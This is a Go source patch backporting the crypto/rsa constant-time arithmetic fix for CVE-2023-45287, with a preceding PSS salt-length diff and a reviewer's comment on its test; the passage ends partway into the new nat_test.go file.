+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -269,7 +269,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ saltLength := opts.saltLength()
+ switch saltLength {
+ case PSSSaltLengthAuto:
+- saltLength = priv.Size() - 2 - hash.Size()
++ saltLength = (priv.N.BitLen()-1+7)/8 - 2 - hash.Size()
+ case PSSSaltLengthEqualsHash:
+ saltLength = hash.Size()
+ }
+diff --git a/src/crypto/rsa/pss_test.go b/src/crypto/rsa/pss_test.go
+index dfa8d8bb5ad02..c3a6d468497cd 100644
+--- a/src/crypto/rsa/pss_test.go
++++ b/src/crypto/rsa/pss_test.go
+@@ -12,7 +12,7 @@ import (
+ _ "crypto/md5"
+ "crypto/rand"
+ "crypto/sha1"
+- _ "crypto/sha256"
++ "crypto/sha256"
+ "encoding/hex"
+ "math/big"
+ "os"
+@@ -233,6 +233,24 @@ func TestPSSSigning(t *testing.T) {
+ }
+ }
+
++func TestSignWithPSSSaltLengthAuto(t *testing.T) {
++ key, err := GenerateKey(rand.Reader, 513)
++ if err != nil {
++ t.Fatal(err)
++ }
++ digest := sha256.Sum256([]byte("message"))
++ signature, err := key.Sign(rand.Reader, digest[:], &PSSOptions{
++ SaltLength: PSSSaltLengthAuto,
++ Hash: crypto.SHA256,
++ })
++ if err != nil {
++ t.Fatal(err)
++ }
++ if len(signature) == 0 {
++ t.Fatal("empty signature returned")
++ }
++}
++
+ func bigFromHex(hex string) *big.Int {
+ n, ok := new(big.Int).SetString(hex, 16)
+ if !ok {
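Review bot: TestSignWithPSSSaltLengthAuto in the pss_test.go part of this backport only checks that key.Sign returns without error and that the signature is non-empty, so it would still pass if the automatic salt length were wrong but signing happened to succeed. Verifying the signature pins the behaviour the fix is meant to restore; after the length check add `if err := VerifyPSS(&key.PublicKey, crypto.SHA256, digest[:], signature, &PSSOptions{SaltLength: PSSSaltLengthAuto}); err != nil { t.Fatal(err) }`. Separately, in the pss.go part, `(priv.N.BitLen()-1+7)/8 - 2 - hash.Size()` can be negative when the modulus is small relative to the hash. The rest of SignPSS lies outside the hunk, so it is worth confirming that a negative saltLength is rejected with an error (for example `if saltLength < 0 { return nil, ErrMessageTooLong }`) before it is used as a buffer size.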
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch
new file mode 100644
index 0000000000..90a74255db
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch
@@ -0,0 +1,1697 @@
+From 8a81fdf165facdcefa06531de5af98a4db343035 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?L=C3=BAc=C3=A1s=20Meier?= <cronokirby@gmail.com>
+Date: Tue, 8 Jun 2021 21:36:06 +0200
+Subject: [PATCH] crypto/rsa: replace big.Int for encryption and decryption
+
+Infamously, big.Int does not provide constant-time arithmetic, making
+its use in cryptographic code quite tricky. RSA uses big.Int
+pervasively, in its public API, for key generation, precomputation, and
+for encryption and decryption. This is a known problem. One mitigation,
+blinding, is already in place during decryption. This helps mitigate the
+very leaky exponentiation operation. Because big.Int is fundamentally
+not constant-time, it's unfortunately difficult to guarantee that
+mitigations like these are completely effective.
+
+This patch removes the use of big.Int for encryption and decryption,
+replacing it with an internal nat type instead. Signing and verification
+are also affected, because they depend on encryption and decryption.
+
+Overall, this patch degrades performance by 55% for private key
+operations, and 4-5x for (much faster) public key operations.
+(Signatures do both, so the slowdown is worse than decryption.)
+
+name old time/op new time/op delta
+DecryptPKCS1v15/2048-8 1.50ms ± 0% 2.34ms ± 0% +56.44% (p=0.000 n=8+10)
+DecryptPKCS1v15/3072-8 4.40ms ± 0% 6.79ms ± 0% +54.33% (p=0.000 n=10+9)
+DecryptPKCS1v15/4096-8 9.31ms ± 0% 15.14ms ± 0% +62.60% (p=0.000 n=10+10)
+EncryptPKCS1v15/2048-8 8.16µs ± 0% 355.58µs ± 0% +4258.90% (p=0.000 n=10+9)
+DecryptOAEP/2048-8 1.50ms ± 0% 2.34ms ± 0% +55.68% (p=0.000 n=10+9)
+EncryptOAEP/2048-8 8.51µs ± 0% 355.95µs ± 0% +4082.75% (p=0.000 n=10+9)
+SignPKCS1v15/2048-8 1.51ms ± 0% 2.69ms ± 0% +77.94% (p=0.000 n=10+10)
+VerifyPKCS1v15/2048-8 7.25µs ± 0% 354.34µs ± 0% +4789.52% (p=0.000 n=9+9)
+SignPSS/2048-8 1.51ms ± 0% 2.70ms ± 0% +78.80% (p=0.000 n=9+10)
+VerifyPSS/2048-8 8.27µs ± 1% 355.65µs ± 0% +4199.39% (p=0.000 n=10+10)
+
+Keep in mind that this is without any assembly at all, and that further
+improvements are likely possible. I think having a review of the logic
+and the cryptography would be a good idea at this stage, before we
+complicate the code too much through optimization.
+
+The bulk of the work is in nat.go. This introduces two new types: nat,
+representing natural numbers, and modulus, representing moduli used in
+modular arithmetic.
+
+A nat has an "announced size", which may be larger than its "true size",
+the number of bits needed to represent this number. Operations on a nat
+will only ever leak its announced size, never its true size, or other
+information about its value. The size of a nat is always clear based on
+how its value is set. For example, x.mod(y, m) will make the announced
+size of x match that of m, since x is reduced modulo m.
+
+Operations assume that the announced size of the operands match what's
+expected (with a few exceptions). For example, x.modAdd(y, m) assumes
+that x and y have the same announced size as m, and that they're reduced
+modulo m.
+
+Nats are represented over unsatured bits.UintSize - 1 bit limbs. This
+means that we can't reuse the assembly routines for big.Int, which use
+saturated bits.UintSize limbs. The advantage of unsaturated limbs is
+that it makes Montgomery multiplication faster, by needing fewer
+registers in a hot loop. This makes exponentiation faster, which
+consists of many Montgomery multiplications.
+
+Moduli use nat internally. Unlike nat, the true size of a modulus always
+matches its announced size. When creating a modulus, any zero padding is
+removed. Moduli will also precompute constants when created, which is
+another reason why having a separate type is desirable.
+
+Updates #20654
+
+Co-authored-by: Filippo Valsorda <filippo@golang.org>
+Change-Id: I73b61f87d58ab912e80a9644e255d552cbadcced
+Reviewed-on: https://go-review.googlesource.com/c/go/+/326012
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+Reviewed-by: Joedian Reid <joedian@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/8a81fdf165facdcefa06531de5af98a4db343035]
+CVE: CVE-2023-45287
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/example_test.go | 21 +-
+ src/crypto/rsa/nat.go | 626 +++++++++++++++++++++++++++++++++
+ src/crypto/rsa/nat_test.go | 384 ++++++++++++++++++++
+ src/crypto/rsa/pkcs1v15.go | 47 +--
+ src/crypto/rsa/pss.go | 50 ++-
+ src/crypto/rsa/pss_test.go | 10 +-
+ src/crypto/rsa/rsa.go | 174 ++++-----
+ 7 files changed, 1143 insertions(+), 169 deletions(-)
+ create mode 100644 src/crypto/rsa/nat.go
+ create mode 100644 src/crypto/rsa/nat_test.go
+
+diff --git a/src/crypto/rsa/example_test.go b/src/crypto/rsa/example_test.go
+index 1435b70..1963609 100644
+--- a/src/crypto/rsa/example_test.go
++++ b/src/crypto/rsa/example_test.go
+@@ -12,7 +12,6 @@ import (
+ "crypto/sha256"
+ "encoding/hex"
+ "fmt"
+- "io"
+ "os"
+ )
+
+@@ -36,21 +35,17 @@ import (
+ // a buffer that contains a random key. Thus, if the RSA result isn't
+ // well-formed, the implementation uses a random key in constant time.
+ func ExampleDecryptPKCS1v15SessionKey() {
+- // crypto/rand.Reader is a good source of entropy for blinding the RSA
+- // operation.
+- rng := rand.Reader
+-
+ // The hybrid scheme should use at least a 16-byte symmetric key. Here
+ // we read the random key that will be used if the RSA decryption isn't
+ // well-formed.
+ key := make([]byte, 32)
+- if _, err := io.ReadFull(rng, key); err != nil {
++ if _, err := rand.Read(key); err != nil {
+ panic("RNG failure")
+ }
+
+ rsaCiphertext, _ := hex.DecodeString("aabbccddeeff")
+
+- if err := DecryptPKCS1v15SessionKey(rng, rsaPrivateKey, rsaCiphertext, key); err != nil {
++ if err := DecryptPKCS1v15SessionKey(nil, rsaPrivateKey, rsaCiphertext, key); err != nil {
+ // Any errors that result will be “public†– meaning that they
+ // can be determined without any secret information. (For
+ // instance, if the length of key is impossible given the RSA
+@@ -86,10 +81,6 @@ func ExampleDecryptPKCS1v15SessionKey() {
+ }
+
+ func ExampleSignPKCS1v15() {
+- // crypto/rand.Reader is a good source of entropy for blinding the RSA
+- // operation.
+- rng := rand.Reader
+-
+ message := []byte("message to be signed")
+
+ // Only small messages can be signed directly; thus the hash of a
+@@ -99,7 +90,7 @@ func ExampleSignPKCS1v15() {
+ // of writing (2016).
+ hashed := sha256.Sum256(message)
+
+- signature, err := SignPKCS1v15(rng, rsaPrivateKey, crypto.SHA256, hashed[:])
++ signature, err := SignPKCS1v15(nil, rsaPrivateKey, crypto.SHA256, hashed[:])
+ if err != nil {
+ fmt.Fprintf(os.Stderr, "Error from signing: %s\n", err)
+ return
+@@ -151,11 +142,7 @@ func ExampleDecryptOAEP() {
+ ciphertext, _ := hex.DecodeString("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")
+ label := []byte("orders")
+
+- // crypto/rand.Reader is a good source of entropy for blinding the RSA
+- // operation.
+- rng := rand.Reader
+-
+- plaintext, err := DecryptOAEP(sha256.New(), rng, test2048Key, ciphertext, label)
++ plaintext, err := DecryptOAEP(sha256.New(), nil, test2048Key, ciphertext, label)
+ if err != nil {
+ fmt.Fprintf(os.Stderr, "Error from decryption: %s\n", err)
+ return
+diff --git a/src/crypto/rsa/nat.go b/src/crypto/rsa/nat.go
+new file mode 100644
+index 0000000..da521c2
+--- /dev/null
++++ b/src/crypto/rsa/nat.go
+@@ -0,0 +1,626 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package rsa
++
++import (
++ "math/big"
++ "math/bits"
++)
++
++const (
++ // _W is the number of bits we use for our limbs.
++ _W = bits.UintSize - 1
++ // _MASK selects _W bits from a full machine word.
++ _MASK = (1 << _W) - 1
++)
++
++// choice represents a constant-time boolean. The value of choice is always
++// either 1 or 0. We use an int instead of bool in order to make decisions in
++// constant time by turning it into a mask.
++type choice uint
++
++func not(c choice) choice { return 1 ^ c }
++
++const yes = choice(1)
++const no = choice(0)
++
++// ctSelect returns x if on == 1, and y if on == 0. The execution time of this
++// function does not depend on its inputs. If on is any value besides 1 or 0,
++// the result is undefined.
++func ctSelect(on choice, x, y uint) uint {
++ // When on == 1, mask is 0b111..., otherwise mask is 0b000...
++ mask := -uint(on)
++ // When mask is all zeros, we just have y, otherwise, y cancels with itself.
++ return y ^ (mask & (y ^ x))
++}
++
++// ctEq returns 1 if x == y, and 0 otherwise. The execution time of this
++// function does not depend on its inputs.
++func ctEq(x, y uint) choice {
++ // If x != y, then either x - y or y - x will generate a carry.
++ _, c1 := bits.Sub(x, y, 0)
++ _, c2 := bits.Sub(y, x, 0)
++ return not(choice(c1 | c2))
++}
++
++// ctGeq returns 1 if x >= y, and 0 otherwise. The execution time of this
++// function does not depend on its inputs.
++func ctGeq(x, y uint) choice {
++ // If x < y, then x - y generates a carry.
++ _, carry := bits.Sub(x, y, 0)
++ return not(choice(carry))
++}
++
++// nat represents an arbitrary natural number
++//
++// Each nat has an announced length, which is the number of limbs it has stored.
++// Operations on this number are allowed to leak this length, but will not leak
++// any information about the values contained in those limbs.
++type nat struct {
++ // limbs is a little-endian representation in base 2^W with
++ // W = bits.UintSize - 1. The top bit is always unset between operations.
++ //
++ // The top bit is left unset to optimize Montgomery multiplication, in the
++ // inner loop of exponentiation. Using fully saturated limbs would leave us
++ // working with 129-bit numbers on 64-bit platforms, wasting a lot of space,
++ // and thus time.
++ limbs []uint
++}
++
++// expand expands x to n limbs, leaving its value unchanged.
++func (x *nat) expand(n int) *nat {
++ for len(x.limbs) > n {
++ if x.limbs[len(x.limbs)-1] != 0 {
++ panic("rsa: internal error: shrinking nat")
++ }
++ x.limbs = x.limbs[:len(x.limbs)-1]
++ }
++ if cap(x.limbs) < n {
++ newLimbs := make([]uint, n)
++ copy(newLimbs, x.limbs)
++ x.limbs = newLimbs
++ return x
++ }
++ extraLimbs := x.limbs[len(x.limbs):n]
++ for i := range extraLimbs {
++ extraLimbs[i] = 0
++ }
++ x.limbs = x.limbs[:n]
++ return x
++}
++
++// reset returns a zero nat of n limbs, reusing x's storage if n <= cap(x.limbs).
++func (x *nat) reset(n int) *nat {
++ if cap(x.limbs) < n {
++ x.limbs = make([]uint, n)
++ return x
++ }
++ for i := range x.limbs {
++ x.limbs[i] = 0
++ }
++ x.limbs = x.limbs[:n]
++ return x
++}
++
++// clone returns a new nat, with the same value and announced length as x.
++func (x *nat) clone() *nat {
++ out := &nat{make([]uint, len(x.limbs))}
++ copy(out.limbs, x.limbs)
++ return out
++}
++
++// natFromBig creates a new natural number from a big.Int.
++//
++// The announced length of the resulting nat is based on the actual bit size of
++// the input, ignoring leading zeroes.
++func natFromBig(x *big.Int) *nat {
++ xLimbs := x.Bits()
++ bitSize := bigBitLen(x)
++ requiredLimbs := (bitSize + _W - 1) / _W
++
++ out := &nat{make([]uint, requiredLimbs)}
++ outI := 0
++ shift := 0
++ for i := range xLimbs {
++ xi := uint(xLimbs[i])
++ out.limbs[outI] |= (xi << shift) & _MASK
++ outI++
++ if outI == requiredLimbs {
++ return out
++ }
++ out.limbs[outI] = xi >> (_W - shift)
++ shift++ // this assumes bits.UintSize - _W = 1
++ if shift == _W {
++ shift = 0
++ outI++
++ }
++ }
++ return out
++}
++
++// fillBytes sets bytes to x as a zero-extended big-endian byte slice.
++//
++// If bytes is not long enough to contain the number or at least len(x.limbs)-1
++// limbs, or has zero length, fillBytes will panic.
++func (x *nat) fillBytes(bytes []byte) []byte {
++ if len(bytes) == 0 {
++ panic("nat: fillBytes invoked with too small buffer")
++ }
++ for i := range bytes {
++ bytes[i] = 0
++ }
++ shift := 0
++ outI := len(bytes) - 1
++ for i, limb := range x.limbs {
++ remainingBits := _W
++ for remainingBits >= 8 {
++ bytes[outI] |= byte(limb) << shift
++ consumed := 8 - shift
++ limb >>= consumed
++ remainingBits -= consumed
++ shift = 0
++ outI--
++ if outI < 0 {
++ if limb != 0 || i < len(x.limbs)-1 {
++ panic("nat: fillBytes invoked with too small buffer")
++ }
++ return bytes
++ }
++ }
++ bytes[outI] = byte(limb)
++ shift = remainingBits
++ }
++ return bytes
++}
++
++// natFromBytes converts a slice of big-endian bytes into a nat.
++//
++// The announced length of the output depends on the length of bytes. Unlike
++// big.Int, creating a nat will not remove leading zeros.
++func natFromBytes(bytes []byte) *nat {
++ bitSize := len(bytes) * 8
++ requiredLimbs := (bitSize + _W - 1) / _W
++
++ out := &nat{make([]uint, requiredLimbs)}
++ outI := 0
++ shift := 0
++ for i := len(bytes) - 1; i >= 0; i-- {
++ bi := bytes[i]
++ out.limbs[outI] |= uint(bi) << shift
++ shift += 8
++ if shift >= _W {
++ shift -= _W
++ out.limbs[outI] &= _MASK
++ outI++
++ if shift > 0 {
++ out.limbs[outI] = uint(bi) >> (8 - shift)
++ }
++ }
++ }
++ return out
++}
++
++// cmpEq returns 1 if x == y, and 0 otherwise.
++//
++// Both operands must have the same announced length.
++func (x *nat) cmpEq(y *nat) choice {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ equal := yes
++ for i := 0; i < size; i++ {
++ equal &= ctEq(xLimbs[i], yLimbs[i])
++ }
++ return equal
++}
++
++// cmpGeq returns 1 if x >= y, and 0 otherwise.
++//
++// Both operands must have the same announced length.
++func (x *nat) cmpGeq(y *nat) choice {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ var c uint
++ for i := 0; i < size; i++ {
++ c = (xLimbs[i] - yLimbs[i] - c) >> _W
++ }
++ // If there was a carry, then subtracting y underflowed, so
++ // x is not greater than or equal to y.
++ return not(choice(c))
++}
++
++// assign sets x <- y if on == 1, and does nothing otherwise.
++//
++// Both operands must have the same announced length.
++func (x *nat) assign(on choice, y *nat) *nat {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ for i := 0; i < size; i++ {
++ xLimbs[i] = ctSelect(on, yLimbs[i], xLimbs[i])
++ }
++ return x
++}
++
++// add computes x += y if on == 1, and does nothing otherwise. It returns the
++// carry of the addition regardless of on.
++//
++// Both operands must have the same announced length.
++func (x *nat) add(on choice, y *nat) (c uint) {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ for i := 0; i < size; i++ {
++ res := xLimbs[i] + yLimbs[i] + c
++ xLimbs[i] = ctSelect(on, res&_MASK, xLimbs[i])
++ c = res >> _W
++ }
++ return
++}
++
++// sub computes x -= y if on == 1, and does nothing otherwise. It returns the
++// borrow of the subtraction regardless of on.
++//
++// Both operands must have the same announced length.
++func (x *nat) sub(on choice, y *nat) (c uint) {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ for i := 0; i < size; i++ {
++ res := xLimbs[i] - yLimbs[i] - c
++ xLimbs[i] = ctSelect(on, res&_MASK, xLimbs[i])
++ c = res >> _W
++ }
++ return
++}
++
++// modulus is used for modular arithmetic, precomputing relevant constants.
++//
++// Moduli are assumed to be odd numbers. Moduli can also leak the exact
++// number of bits needed to store their value, and are stored without padding.
++//
++// Their actual value is still kept secret.
++type modulus struct {
++ // The underlying natural number for this modulus.
++ //
++ // This will be stored without any padding, and shouldn't alias with any
++ // other natural number being used.
++ nat *nat
++ leading int // number of leading zeros in the modulus
++ m0inv uint // -nat.limbs[0]â»Â¹ mod _W
++}
++
++// minusInverseModW computes -xâ»Â¹ mod _W with x odd.
++//
++// This operation is used to precompute a constant involved in Montgomery
++// multiplication.
++func minusInverseModW(x uint) uint {
++ // Every iteration of this loop doubles the least-significant bits of
++ // correct inverse in y. The first three bits are already correct (1â»Â¹ = 1,
++ // 3â»Â¹ = 3, 5â»Â¹ = 5, and 7â»Â¹ = 7 mod 8), so doubling five times is enough
++ // for 61 bits (and wastes only one iteration for 31 bits).
++ //
++ // See https://crypto.stackexchange.com/a/47496.
++ y := x
++ for i := 0; i < 5; i++ {
++ y = y * (2 - x*y)
++ }
++ return (1 << _W) - (y & _MASK)
++}
++
++// modulusFromNat creates a new modulus from a nat.
++//
++// The nat should be odd, nonzero, and the number of significant bits in the
++// number should be leakable. The nat shouldn't be reused.
++func modulusFromNat(nat *nat) *modulus {
++ m := &modulus{}
++ m.nat = nat
++ size := len(m.nat.limbs)
++ for m.nat.limbs[size-1] == 0 {
++ size--
++ }
++ m.nat.limbs = m.nat.limbs[:size]
++ m.leading = _W - bitLen(m.nat.limbs[size-1])
++ m.m0inv = minusInverseModW(m.nat.limbs[0])
++ return m
++}
++
++// bitLen is a version of bits.Len that only leaks the bit length of n, but not
++// its value. bits.Len and bits.LeadingZeros use a lookup table for the
++// low-order bits on some architectures.
++func bitLen(n uint) int {
++ var len int
++ // We assume, here and elsewhere, that comparison to zero is constant time
++ // with respect to different non-zero values.
++ for n != 0 {
++ len++
++ n >>= 1
++ }
++ return len
++}
++
++// bigBitLen is a version of big.Int.BitLen that only leaks the bit length of x,
++// but not its value. big.Int.BitLen uses bits.Len.
++func bigBitLen(x *big.Int) int {
++ xLimbs := x.Bits()
++ fullLimbs := len(xLimbs) - 1
++ topLimb := uint(xLimbs[len(xLimbs)-1])
++ return fullLimbs*bits.UintSize + bitLen(topLimb)
++}
++
++// modulusSize returns the size of m in bytes.
++func modulusSize(m *modulus) int {
++ bits := len(m.nat.limbs)*_W - int(m.leading)
++ return (bits + 7) / 8
++}
++
++// shiftIn calculates x = x << _W + y mod m.
++//
++// This assumes that x is already reduced mod m, and that y < 2^_W.
++func (x *nat) shiftIn(y uint, m *modulus) *nat {
++ d := new(nat).resetFor(m)
++
++ // Eliminate bounds checks in the loop.
++ size := len(m.nat.limbs)
++ xLimbs := x.limbs[:size]
++ dLimbs := d.limbs[:size]
++ mLimbs := m.nat.limbs[:size]
++
++ // Each iteration of this loop computes x = 2x + b mod m, where b is a bit
++ // from y. Effectively, it left-shifts x and adds y one bit at a time,
++ // reducing it every time.
++ //
++ // To do the reduction, each iteration computes both 2x + b and 2x + b - m.
++ // The next iteration (and finally the return line) will use either result
++ // based on whether the subtraction underflowed.
++ needSubtraction := no
++ for i := _W - 1; i >= 0; i-- {
++ carry := (y >> i) & 1
++ var borrow uint
++ for i := 0; i < size; i++ {
++ l := ctSelect(needSubtraction, dLimbs[i], xLimbs[i])
++
++ res := l<<1 + carry
++ xLimbs[i] = res & _MASK
++ carry = res >> _W
++
++ res = xLimbs[i] - mLimbs[i] - borrow
++ dLimbs[i] = res & _MASK
++ borrow = res >> _W
++ }
++ // See modAdd for how carry (aka overflow), borrow (aka underflow), and
++ // needSubtraction relate.
++ needSubtraction = ctEq(carry, borrow)
++ }
++ return x.assign(needSubtraction, d)
++}
++
++// mod calculates out = x mod m.
++//
++// This works regardless how large the value of x is.
++//
++// The output will be resized to the size of m and overwritten.
++func (out *nat) mod(x *nat, m *modulus) *nat {
++ out.resetFor(m)
++ // Working our way from the most significant to the least significant limb,
++ // we can insert each limb at the least significant position, shifting all
++ // previous limbs left by _W. This way each limb will get shifted by the
++ // correct number of bits. We can insert at least N - 1 limbs without
++ // overflowing m. After that, we need to reduce every time we shift.
++ i := len(x.limbs) - 1
++ // For the first N - 1 limbs we can skip the actual shifting and position
++ // them at the shifted position, which starts at min(N - 2, i).
++ start := len(m.nat.limbs) - 2
++ if i < start {
++ start = i
++ }
++ for j := start; j >= 0; j-- {
++ out.limbs[j] = x.limbs[i]
++ i--
++ }
++ // We shift in the remaining limbs, reducing modulo m each time.
++ for i >= 0 {
++ out.shiftIn(x.limbs[i], m)
++ i--
++ }
++ return out
++}
++
++// expandFor ensures out has the right size to work with operations modulo m.
++//
++// This assumes that out has as many or fewer limbs than m, or that the extra
++// limbs are all zero (which may happen when decoding a value that has leading
++// zeroes in its bytes representation that spill over the limb threshold).
++func (out *nat) expandFor(m *modulus) *nat {
++ return out.expand(len(m.nat.limbs))
++}
++
++// resetFor ensures out has the right size to work with operations modulo m.
++//
++// out is zeroed and may start at any size.
++func (out *nat) resetFor(m *modulus) *nat {
++ return out.reset(len(m.nat.limbs))
++}
++
++// modSub computes x = x - y mod m.
++//
++// The length of both operands must be the same as the modulus. Both operands
++// must already be reduced modulo m.
++func (x *nat) modSub(y *nat, m *modulus) *nat {
++ underflow := x.sub(yes, y)
++ // If the subtraction underflowed, add m.
++ x.add(choice(underflow), m.nat)
++ return x
++}
++
++// modAdd computes x = x + y mod m.
++//
++// The length of both operands must be the same as the modulus. Both operands
++// must already be reduced modulo m.
++func (x *nat) modAdd(y *nat, m *modulus) *nat {
++ overflow := x.add(yes, y)
++ underflow := not(x.cmpGeq(m.nat)) // x < m
++
++ // Three cases are possible:
++ //
++ // - overflow = 0, underflow = 0
++ //
++ // In this case, addition fits in our limbs, but we can still subtract away
++ // m without an underflow, so we need to perform the subtraction to reduce
++ // our result.
++ //
++ // - overflow = 0, underflow = 1
++ //
++ // The addition fits in our limbs, but we can't subtract m without
++ // underflowing. The result is already reduced.
++ //
++ // - overflow = 1, underflow = 1
++ //
++ // The addition does not fit in our limbs, and the subtraction's borrow
++ // would cancel out with the addition's carry. We need to subtract m to
++ // reduce our result.
++ //
++ // The overflow = 1, underflow = 0 case is not possible, because y is at
++ // most m - 1, and if adding m - 1 overflows, then subtracting m must
++ // necessarily underflow.
++ needSubtraction := ctEq(overflow, uint(underflow))
++
++ x.sub(needSubtraction, m.nat)
++ return x
++}
++
++// montgomeryRepresentation calculates x = x * R mod m, with R = 2^(_W * n) and
++// n = len(m.nat.limbs).
++//
++// Faster Montgomery multiplication replaces standard modular multiplication for
++// numbers in this representation.
++//
++// This assumes that x is already reduced mod m.
++func (x *nat) montgomeryRepresentation(m *modulus) *nat {
++ for i := 0; i < len(m.nat.limbs); i++ {
++ x.shiftIn(0, m) // x = x * 2^_W mod m
++ }
++ return x
++}
++
++// montgomeryMul calculates d = a * b / R mod m, with R = 2^(_W * n) and
++// n = len(m.nat.limbs), using the Montgomery Multiplication technique.
++//
++// All inputs should be the same length, not aliasing d, and already
++// reduced modulo m. d will be resized to the size of m and overwritten.
++func (d *nat) montgomeryMul(a *nat, b *nat, m *modulus) *nat {
++ // See https://bearssl.org/bigint.html#montgomery-reduction-and-multiplication
++ // for a description of the algorithm.
++
++ // Eliminate bounds checks in the loop.
++ size := len(m.nat.limbs)
++ aLimbs := a.limbs[:size]
++ bLimbs := b.limbs[:size]
++ dLimbs := d.resetFor(m).limbs[:size]
++ mLimbs := m.nat.limbs[:size]
++
++ var overflow uint
++ for i := 0; i < size; i++ {
++ f := ((dLimbs[0] + aLimbs[i]*bLimbs[0]) * m.m0inv) & _MASK
++ carry := uint(0)
++ for j := 0; j < size; j++ {
++ // z = d[j] + a[i] * b[j] + f * m[j] + carry <= 2^(2W+1) - 2^(W+1) + 2^W
++ hi, lo := bits.Mul(aLimbs[i], bLimbs[j])
++ z_lo, c := bits.Add(dLimbs[j], lo, 0)
++ z_hi, _ := bits.Add(0, hi, c)
++ hi, lo = bits.Mul(f, mLimbs[j])
++ z_lo, c = bits.Add(z_lo, lo, 0)
++ z_hi, _ = bits.Add(z_hi, hi, c)
++ z_lo, c = bits.Add(z_lo, carry, 0)
++ z_hi, _ = bits.Add(z_hi, 0, c)
++ if j > 0 {
++ dLimbs[j-1] = z_lo & _MASK
++ }
++ carry = z_hi<<1 | z_lo>>_W // carry <= 2^(W+1) - 2
++ }
++ z := overflow + carry // z <= 2^(W+1) - 1
++ dLimbs[size-1] = z & _MASK
++ overflow = z >> _W // overflow <= 1
++ }
++ // See modAdd for how overflow, underflow, and needSubtraction relate.
++ underflow := not(d.cmpGeq(m.nat)) // d < m
++ needSubtraction := ctEq(overflow, uint(underflow))
++ d.sub(needSubtraction, m.nat)
++
++ return d
++}
++
++// modMul calculates x *= y mod m.
++//
++// x and y must already be reduced modulo m, they must share its announced
++// length, and they may not alias.
++func (x *nat) modMul(y *nat, m *modulus) *nat {
++ // A Montgomery multiplication by a value out of the Montgomery domain
++ // takes the result out of Montgomery representation.
++ xR := x.clone().montgomeryRepresentation(m) // xR = x * R mod m
++ return x.montgomeryMul(xR, y, m) // x = xR * y / R mod m
++}
++
++// exp calculates out = x^e mod m.
++//
++// The exponent e is represented in big-endian order. The output will be resized
++// to the size of m and overwritten. x must already be reduced modulo m.
++func (out *nat) exp(x *nat, e []byte, m *modulus) *nat {
++ // We use a 4 bit window. For our RSA workload, 4 bit windows are faster
++ // than 2 bit windows, but use an extra 12 nats worth of scratch space.
++ // Using bit sizes that don't divide 8 are more complex to implement.
++ table := make([]*nat, (1<<4)-1) // table[i] = x ^ (i+1)
++ table[0] = x.clone().montgomeryRepresentation(m)
++ for i := 1; i < len(table); i++ {
++ table[i] = new(nat).expandFor(m)
++ table[i].montgomeryMul(table[i-1], table[0], m)
++ }
++
++ out.resetFor(m)
++ out.limbs[0] = 1
++ out.montgomeryRepresentation(m)
++ t0 := new(nat).expandFor(m)
++ t1 := new(nat).expandFor(m)
++ for _, b := range e {
++ for _, j := range []int{4, 0} {
++ // Square four times.
++ t1.montgomeryMul(out, out, m)
++ out.montgomeryMul(t1, t1, m)
++ t1.montgomeryMul(out, out, m)
++ out.montgomeryMul(t1, t1, m)
++
++ // Select x^k in constant time from the table.
++ k := uint((b >> j) & 0b1111)
++ for i := range table {
++ t0.assign(ctEq(k, uint(i+1)), table[i])
++ }
++
++ // Multiply by x^k, discarding the result if k = 0.
++ t1.montgomeryMul(out, t0, m)
++ out.assign(not(ctEq(k, 0)), t1)
++ }
++ }
++
++ // By Montgomery multiplying with 1 not in Montgomery representation, we
++ // convert out back from Montgomery representation, because it works out to
++ // dividing by R.
++ t0.assign(yes, out)
++ t1.resetFor(m)
++ t1.limbs[0] = 1
++ out.montgomeryMul(t0, t1, m)
++
++ return out
++}
+diff --git a/src/crypto/rsa/nat_test.go b/src/crypto/rsa/nat_test.go
+new file mode 100644
+index 0000000..3e6eb10
+--- /dev/null
++++ b/src/crypto/rsa/nat_test.go
+@@ -0,0 +1,384 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package rsa
++
++import (
++ "bytes"
++ "math/big"
++ "math/bits"
++ "math/rand"
++ "reflect"
++ "testing"
++ "testing/quick"
++)
++
++// Generate generates an even nat. It's used by testing/quick to produce random
++// *nat values for quick.Check invocations.
++func (*nat) Generate(r *rand.Rand, size int) reflect.Value {
++ limbs := make([]uint, size)
++ for i := 0; i < size; i++ {
++ limbs[i] = uint(r.Uint64()) & ((1 << _W) - 2)
++ }
++ return reflect.ValueOf(&nat{limbs})
++}
++
++func testModAddCommutative(a *nat, b *nat) bool {
++ mLimbs := make([]uint, len(a.limbs))
++ for i := 0; i < len(mLimbs); i++ {
++ mLimbs[i] = _MASK
++ }
++ m := modulusFromNat(&nat{mLimbs})
++ aPlusB := a.clone()
++ aPlusB.modAdd(b, m)
++ bPlusA := b.clone()
++ bPlusA.modAdd(a, m)
++ return aPlusB.cmpEq(bPlusA) == 1
++}
++
++func TestModAddCommutative(t *testing.T) {
